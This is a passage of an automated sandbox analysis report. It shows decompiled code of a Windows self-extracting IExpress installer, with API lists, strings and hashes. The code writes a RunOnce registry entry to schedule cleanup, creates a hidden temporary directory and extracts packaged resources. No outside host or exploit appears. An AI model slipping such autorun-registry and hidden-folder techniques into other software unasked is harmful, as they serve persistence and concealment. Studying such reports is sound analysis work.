                              				_t20 = _a12;
                              				_t18 = _a4;
                              				 *0x10e9124 = 0;
                              				if(E010E2CAA(_a4, _a12, _t29, _t17) != 0) {
                              					_t9 = E010E2F1D(_t18, _t20); // executed
                              					_t22 = _t9; // executed
                              					E010E52B6(0, _t18, _t21, _t22); // executed
                              					if(_t22 != 0) {
                              						_t32 =  *0x10e8a3a; // 0x0
                              						if(_t32 == 0) {
                              							_t19 =  *0x10e9a2c; // 0x0
                              							if((_t19 & 0x00000001) != 0) {
                              								E010E1F90(_t19, _t21, _t22);
                              							}
                              						}
                              					}
                              				}
                              				_t6 =  *0x10e8588; // 0x0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0x10e9124; // 0x0
                              				return _t7;
                              			}



















                              APIs
                              • GetVersion.KERNEL32(?,00000002,00000000,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C03
                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C18
                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010E2C28
                              • CloseHandle.KERNEL32(00000000,?,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseModuleProcVersion
                              • String ID: HeapSetInformation$Kernel32.dll
                              • API String ID: 62482547-3460614246
                              • Opcode ID: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                              • Instruction ID: 1d48701aa665d387c2c3b06bbc4c3469eee0372eae773036b035d141fab33b34
                              • Opcode Fuzzy Hash: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                              • Instruction Fuzzy Hash: 901106713002099FE7346BFBEC4CA6B3FDD9B88B94B040059FAC0DB244CA3AE8518760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E6F40() {
                              
                              				SetUnhandledExceptionFilter(E010E6EF0); // executed
                              				return 0;
                              			}



                              0x010e6f45
                              0x010e6f4d

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010E6F45
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                              • Instruction ID: 0836b0f47164795217a833360d9432150cdf74d9c3ef8bcdcf81ae55d0754bb1
                              • Opcode Fuzzy Hash: 6958eb14360333b58a6a069389daf9e1eeace4cbceb1e7b99ea94bfa036dc0c7
                              • Instruction Fuzzy Hash: A09002703511008B96201B73A91D42579D15A5EA42B8154A5B091CD588DB6680405611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 93%
                              			E010E202A(struct HINSTANCE__* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				char _v528;
                              				void* _v532;
                              				int _v536;
                              				int _v540;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				long _t36;
                              				long _t41;
                              				struct HINSTANCE__* _t46;
                              				intOrPtr _t49;
                              				intOrPtr _t50;
                              				CHAR* _t54;
                              				void _t56;
                              				signed int _t66;
                              				intOrPtr* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t80;
                              				intOrPtr* _t81;
                              				void* _t86;
                              				void* _t87;
                              				void* _t90;
                              				_Unknown_base(*)()* _t91;
                              				signed int _t93;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t79 = __edx;
                              				_t28 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t28 ^ _t93;
                              				_t84 = 0x104;
                              				memset( &_v268, 0, 0x104);
                              				memset( &_v528, 0, 0x104);
                              				_t95 = _t94 + 0x18;
                              				_t66 = 0;
                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                              				if(_t36 != 0) {
                              					L24:
                              					return E010E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                              				}
                              				_push(_t86);
                              				_t87 = 0;
                              				while(1) {
                              					E010E171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                              					_t95 = _t95 + 0x10;
                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                              					if(_t41 != 0) {
                              						break;
                              					}
                              					_t87 = _t87 + 1;
                              					if(_t87 < 0xc8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				if(_t87 != 0xc8) {
                              					GetSystemDirectoryA( &_v528, _t84);
                              					_t79 = _t84;
                              					E010E658A( &_v528, _t84, "advpack.dll");
                              					_t46 = LoadLibraryA( &_v528); // executed
                              					_t84 = _t46;
                              					if(_t84 == 0) {
                              						L10:
                              						if(GetModuleFileNameA( *0x10e9a3c,  &_v268, 0x104) == 0) {
                              							L17:
                              							_t36 = RegCloseKey(_v532);
                              							L23:
                              							_pop(_t86);
                              							goto L24;
                              						}
                              						L11:
                              						_t72 =  &_v268;
                              						_t80 = _t72 + 1;
                              						do {
                              							_t49 =  *_t72;
                              							_t72 = _t72 + 1;
                              						} while (_t49 != 0);
                              						_t73 = _t72 - _t80;
                              						_t81 = 0x10e91e4;
                              						do {
                              							_t50 =  *_t81;
                              							_t81 = _t81 + 1;
                              						} while (_t50 != 0);
                              						_t84 = _t73 + 0x50 + _t81 - 0x10e91e5;
                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10e91e5);
                              						if(_t90 != 0) {
                              							 *0x10e8580 = _t66 ^ 0x00000001;
                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                              							if(_t66 == 0) {
                              								_t54 = "%s /D:%s";
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              							E010E171E(_t90, _t84, _t54,  &_v268);
                              							_t75 = _t90;
                              							_t23 = _t75 + 1; // 0x1
                              							_t79 = _t23;
                              							do {
                              								_t56 =  *_t75;
                              								_t75 = _t75 + 1;
                              							} while (_t56 != 0);
                              							_t24 = _t75 - _t79 + 1; // 0x2
                              							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                              							RegCloseKey(_v532); // executed
                              							_t36 = LocalFree(_t90);
                              							goto L23;
                              						}
                              						_t79 = 0x4b5;
                              						E010E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                              						goto L17;
                              					}
                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                              					_t66 = 0 | _t91 != 0x00000000;
                              					FreeLibrary(_t84); // executed
                              					if(_t91 == 0) {
                              						goto L10;
                              					}
                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              						E010E658A( &_v268, 0x104, 0x10e1140);
                              					}
                              					goto L11;
                              				}
                              				_t36 = RegCloseKey(_v532);
                              				 *0x10e8530 = _t66;
                              				goto L23;
                              			}

                              APIs
                              • memset.MSVCRT ref: 010E2050
                              • memset.MSVCRT ref: 010E205F
                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010E208C
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20C9
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E20EA
                              • GetSystemDirectoryA.KERNEL32 ref: 010E2103
                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2122
                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010E2134
                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2144
                              • GetSystemDirectoryA.KERNEL32 ref: 010E215B
                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E218C
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21C1
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E21E4
                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010E223D
                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2249
                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010E2250
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                              • API String ID: 178549006-3726664654
                              • Opcode ID: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                              • Instruction ID: 61413f4f215ee9dfda85ec6e159f34a4e4b34b7e3e60d47f79192310cd9be37a
                              • Opcode Fuzzy Hash: 8721151be2ce48389aba8df63ad2cabe259ab1fa513347850f1c3bb4bc49dc66
                              • Instruction Fuzzy Hash: B6510572A00214AFDB309B67DC4CFEA7BECEB54B40F0041E9BAC5EB145DA769E448B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 10e55a0-10e55d9 call 10e468f LocalAlloc 235 10e55fd-10e560c call 10e468f 232->235 236 10e55db-10e55f1 call 10e44b9 call 10e6285 232->236 241 10e560e-10e5630 call 10e44b9 LocalFree 235->241 242 10e5632-10e5643 lstrcmpA 235->242 248 10e55f6-10e55f8 236->248 241->248 245 10e564b-10e5659 LocalFree 242->245 246 10e5645 242->246 250 10e565b-10e565d 245->250 251 10e5696-10e569c 245->251 246->245 252 10e58b7-10e58c7 call 10e6ce0 248->252 255 10e565f-10e5667 250->255 256 10e5669 250->256 253 10e589f-10e58b5 call 10e6517 251->253 254 10e56a2-10e56a8 251->254 253->252 254->253 259 10e56ae-10e56c1 GetTempPathA 254->259 255->256 260 10e566b-10e567a call 10e5467 255->260 256->260 263 10e56f3-10e5711 call 10e1781 259->263 264 10e56c3-10e56c9 call 10e5467 259->264 269 10e589b-10e589d 260->269 270 10e5680-10e5691 call 10e44b9 260->270 274 10e586c-10e5890 GetWindowsDirectoryA call 10e597d 263->274 275 10e5717-10e5729 GetDriveTypeA 263->275 272 10e56ce-10e56d0 264->272 269->252 270->248 272->269 276 10e56d6-10e56df call 10e2630 272->276 274->263 288 10e5896 274->288 278 10e572b-10e572e 275->278 279 10e5730-10e5740 GetFileAttributesA 275->279 276->263 289 10e56e1-10e56ed call 10e5467 276->289 278->279 282 10e5742-10e5745 278->282 279->282 283 10e577e-10e578f call 10e597d 279->283 286 10e576b 282->286 287 10e5747-10e574f 282->287 295 10e57b2-10e57bf call 10e2630 283->295 296 10e5791-10e579e call 10e2630 283->296 292 10e5771-10e5779 286->292 287->292 293 10e5751-10e5753 287->293 288->269 289->263 289->269 298 10e5864-10e5866 292->298 293->292 297 10e5755-10e5762 call 10e6952 293->297 307 10e57d3-10e57f8 call 10e658a GetFileAttributesA 295->307 308 10e57c1-10e57cd GetWindowsDirectoryA 295->308 296->286 306 10e57a0-10e57b0 call 10e597d 296->306 297->286 309 10e5764-10e5769 297->309 298->274 298->275 306->286 306->295 314 10e580a 307->314 315 10e57fa-10e5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 10e580d-10e580f 
314->316 315->316 317 10e5827-10e585c SetFileAttributesA call 10e1781 call 10e5467 316->317 318 10e5811-10e5825 316->318 317->269 323 10e585e 317->323 318->298 323->298
                              C-Code - Quality: 92%
                              			E010E55A0(void* __eflags) {
                              				signed int _v8;
                              				char _v265;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				int _t32;
                              				int _t33;
                              				int _t35;
                              				signed int _t36;
                              				signed int _t38;
                              				int _t40;
                              				int _t44;
                              				long _t48;
                              				int _t49;
                              				int _t50;
                              				signed int _t53;
                              				int _t54;
                              				int _t59;
                              				char _t60;
                              				int _t65;
                              				char _t66;
                              				int _t67;
                              				int _t68;
                              				int _t69;
                              				int _t70;
                              				int _t71;
                              				struct _SECURITY_ATTRIBUTES* _t72;
                              				int _t73;
                              				CHAR* _t82;
                              				CHAR* _t88;
                              				void* _t103;
                              				signed int _t110;
                              
                              				_t28 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t28 ^ _t110;
                              				_t2 = E010E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                              				_t109 = LocalAlloc(0x40, _t2);
                              				if(_t109 != 0) {
                              					_t82 = "RUNPROGRAM";
                              					_t32 = E010E468F(_t82, _t109, 1);
                              					__eflags = _t32;
                              					if(_t32 != 0) {
                              						_t33 = lstrcmpA(_t109, "<None>");
                              						__eflags = _t33;
                              						if(_t33 == 0) {
                              							 *0x10e9a30 = 1;
                              						}
                              						LocalFree(_t109);
                              						_t35 =  *0x10e8b3e; // 0x0
                              						__eflags = _t35;
                              						if(_t35 == 0) {
                              							__eflags =  *0x10e8a24; // 0x0
                              							if(__eflags != 0) {
                              								L46:
                              								_t101 = 0x7d2;
                              								_t36 = E010E6517(_t82, 0x7d2, 0, E010E3210, 0, 0);
                              								asm("sbb eax, eax");
                              								_t38 =  ~( ~_t36);
                              							} else {
                              								__eflags =  *0x10e9a30; // 0x0
                              								if(__eflags != 0) {
                              									goto L46;
                              								} else {
                              									_t109 = 0x10e91e4;
                              									_t40 = GetTempPathA(0x104, 0x10e91e4);
                              									__eflags = _t40;
                              									if(_t40 == 0) {
                              										L19:
                              										_push(_t82);
                              										E010E1781( &_v268, 0x104, _t82, "A:\\");
                              										__eflags = _v268 - 0x5a;
                              										if(_v268 <= 0x5a) {
                              											do {
                              												_t109 = GetDriveTypeA( &_v268);
                              												__eflags = _t109 - 6;
                              												if(_t109 == 6) {
                              													L22:
                              													_t48 = GetFileAttributesA( &_v268);
                              													__eflags = _t48 - 0xffffffff;
                              													if(_t48 != 0xffffffff) {
                              														goto L30;
                              													} else {
                              														goto L23;
                              													}
                              												} else {
                              													__eflags = _t109 - 3;
                              													if(_t109 != 3) {
                              														L23:
                              														__eflags = _t109 - 2;
                              														if(_t109 != 2) {
                              															L28:
                              															_t66 = _v268;
                              															goto L29;
                              														} else {
                              															_t66 = _v268;
                              															__eflags = _t66 - 0x41;
                              															if(_t66 == 0x41) {
                              																L29:
                              																_t60 = _t66 + 1;
                              																_v268 = _t60;
                              																goto L42;
                              															} else {
                              																__eflags = _t66 - 0x42;
                              																if(_t66 == 0x42) {
                              																	goto L29;
                              																} else {
                              																	_t68 = E010E6952( &_v268);
                              																	__eflags = _t68;
                              																	if(_t68 == 0) {
                              																		goto L28;
                              																	} else {
                              																		__eflags = _t68 - 0x19000;
                              																		if(_t68 >= 0x19000) {
                              																			L30:
                              																			_push(0);
                              																			_t103 = 3;
                              																			_t49 = E010E597D( &_v268, _t103, 1);
                              																			__eflags = _t49;
                              																			if(_t49 != 0) {
                              																				L33:
                              																				_t50 = E010E2630(0,  &_v268, 1);
                              																				__eflags = _t50;
                              																				if(_t50 != 0) {
                              																					GetWindowsDirectoryA( &_v268, 0x104);
                              																				}
                              																				_t88 =  &_v268;
                              																				E010E658A(_t88, 0x104, "msdownld.tmp");
                              																				_t53 = GetFileAttributesA( &_v268);
                              																				__eflags = _t53 - 0xffffffff;
                              																				if(_t53 != 0xffffffff) {
                              																					_t54 = _t53 & 0x00000010;
                              																					__eflags = _t54;
                              																				} else {
                              																					_t54 = CreateDirectoryA( &_v268, 0);
                              																				}
                              																				__eflags = _t54;
                              																				if(_t54 != 0) {
                              																					SetFileAttributesA( &_v268, 2);
                              																					_push(_t88);
                              																					_t109 = 0x10e91e4;
                              																					E010E1781(0x10e91e4, 0x104, _t88,  &_v268);
                              																					_t101 = 1;
                              																					_t59 = E010E5467(0x10e91e4, 1, 0);
                              																					__eflags = _t59;
                              																					if(_t59 != 0) {
                              																						goto L45;
                              																					} else {
                              																						_t60 = _v268;
                              																						goto L42;
                              																					}
                              																				} else {
                              																					_t60 = _v268 + 1;
                              																					_v265 = 0;
                              																					_v268 = _t60;
                              																					goto L42;
                              																				}
                              																			} else {
                              																				_t65 = E010E2630(0,  &_v268, 1);
                              																				__eflags = _t65;
                              																				if(_t65 != 0) {
                              																					goto L28;
                              																				} else {
                              																					_t67 = E010E597D( &_v268, 1, 1, 0);
                              																					__eflags = _t67;
                              																					if(_t67 == 0) {
                              																						goto L28;
                              																					} else {
                              																						goto L33;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			goto L28;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														goto L22;
                              													}
                              												}
                              												goto L47;
                              												L42:
                              												__eflags = _t60 - 0x5a;
                              											} while (_t60 <= 0x5a);
                              										}
                              										goto L43;
                              									} else {
                              										_t101 = 1;
                              										_t69 = E010E5467(0x10e91e4, 1, 3); // executed
                              										__eflags = _t69;
                              										if(_t69 != 0) {
                              											goto L45;
                              										} else {
                              											_t82 = 0x10e91e4;
                              											_t70 = E010E2630(0, 0x10e91e4, 1);
                              											__eflags = _t70;
                              											if(_t70 != 0) {
                              												goto L19;
                              											} else {
                              												_t101 = 1;
                              												_t82 = 0x10e91e4;
                              												_t71 = E010E5467(0x10e91e4, 1, 1);
                              												__eflags = _t71;
                              												if(_t71 != 0) {
                              													goto L45;
                              												} else {
                              													do {
                              														goto L19;
                              														L43:
                              														GetWindowsDirectoryA( &_v268, 0x104);
                              														_push(4);
                              														_t101 = 3;
                              														_t82 =  &_v268;
                              														_t44 = E010E597D(_t82, _t101, 1);
                              														__eflags = _t44;
                              													} while (_t44 != 0);
                              													goto L2;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							}
                              						} else {
                              							__eflags = _t35 - 0x5c;
                              							if(_t35 != 0x5c) {
                              								L10:
                              								_t72 = 1;
                              							} else {
                              								__eflags =  *0x10e8b3f - _t35; // 0x0
                              								_t72 = 0;
                              								if(__eflags != 0) {
                              									goto L10;
                              								}
                              							}
                              							_t101 = 0;
                              							_t73 = E010E5467(0x10e8b3e, 0, _t72);
                              							__eflags = _t73;
                              							if(_t73 != 0) {
                              								L45:
                              								_t38 = 1;
                              							} else {
                              								_t101 = 0x4be;
                              								E010E44B9(0, 0x4be, 0, 0, 0x10, 0);
                              								goto L2;
                              							}
                              						}
                              					} else {
                              						_t101 = 0x4b1;
                              						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						LocalFree(_t109);
                              						 *0x10e9124 = 0x80070714;
                              						goto L2;
                              					}
                              				} else {
                              					_t101 = 0x4b5;
                              					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					 *0x10e9124 = E010E6285();
                              					L2:
                              					_t38 = 0;
                              				}
                              				L47:
                              				return E010E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                              			}
                              0x010e5669
                              0x010e565f
                              0x010e565f
                              0x010e5665
                              0x010e5667
                              0x00000000
                              0x00000000
                              0x010e5667
                              0x010e566c
                              0x010e5673
                              0x010e5678
                              0x010e567a
                              0x010e589b
                              0x010e589b
                              0x010e5680
                              0x010e5685
                              0x010e568c
                              0x00000000
                              0x010e568c
                              0x010e567a
                              0x010e560e
                              0x010e5613
                              0x010e561a
                              0x010e5620
                              0x010e5626
                              0x00000000
                              0x010e5626
                              0x010e55db
                              0x010e55e0
                              0x010e55e7
                              0x010e55f1
                              0x010e55f6
                              0x010e55f6
                              0x010e55f6
                              0x010e58b7
                              0x010e58c7

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010E55CF
                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010E5638
                              • LocalFree.KERNEL32(00000000), ref: 010E564C
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5620
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010E56B9
                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010E571E
                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010E5737
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010E57CD
                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010E57EF
                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010E5802
                                • Part of subcall function 010E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010E2654
                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010E5830
                                • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010E5878
                                • Part of subcall function 010E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                • Part of subcall function 010E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 2436801531-2740620654
                              • Opcode ID: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                              • Instruction ID: cff82595484126ce4bf40ebe1460c108c5ba3033df425f3ff7bbb180b8dc6486
                              • Opcode Fuzzy Hash: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                              • Instruction Fuzzy Hash: 4A812A79B042059EDB719A379D4CBFE76EDAB64708F0408E6E5C6E7180DFB48D818B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E010E53A1(CHAR* __ecx, CHAR* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t5;
                              				long _t13;
                              				int _t14;
                              				CHAR* _t20;
                              				int _t29;
                              				int _t30;
                              				CHAR* _t32;
                              				signed int _t33;
                              				void* _t34;
                              
                              				_t5 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t5 ^ _t33;
                              				_t32 = __edx;
                              				_t20 = __ecx;
                              				_t29 = 0;
                              				while(1) {
                              					E010E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                              					_t34 = _t34 + 0x10;
                              					_t29 = _t29 + 1;
                              					E010E1680(_t32, 0x104, _t20);
                              					E010E658A(_t32, 0x104,  &_v268); // executed
                              					RemoveDirectoryA(_t32); // executed
                              					_t13 = GetFileAttributesA(_t32); // executed
                              					if(_t13 == 0xffffffff) {
                              						break;
                              					}
                              					if(_t29 < 0x190) {
                              						continue;
                              					}
                              					L3:
                              					_t30 = 0;
                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                              						_t30 = 1;
                              						DeleteFileA(_t32);
                              						CreateDirectoryA(_t32, 0);
                              					}
                              					L5:
                              					return E010E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                              				}
                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                              				if(_t14 == 0) {
                              					goto L3;
                              				}
                              				_t30 = 1;
                              				 *0x10e8a20 = 1;
                              				goto L5;
                              			}

                              APIs
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E53FB
                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5402
                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E541F
                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E542B
                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5434
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5452
                              Strings
                              Memory Dump Source
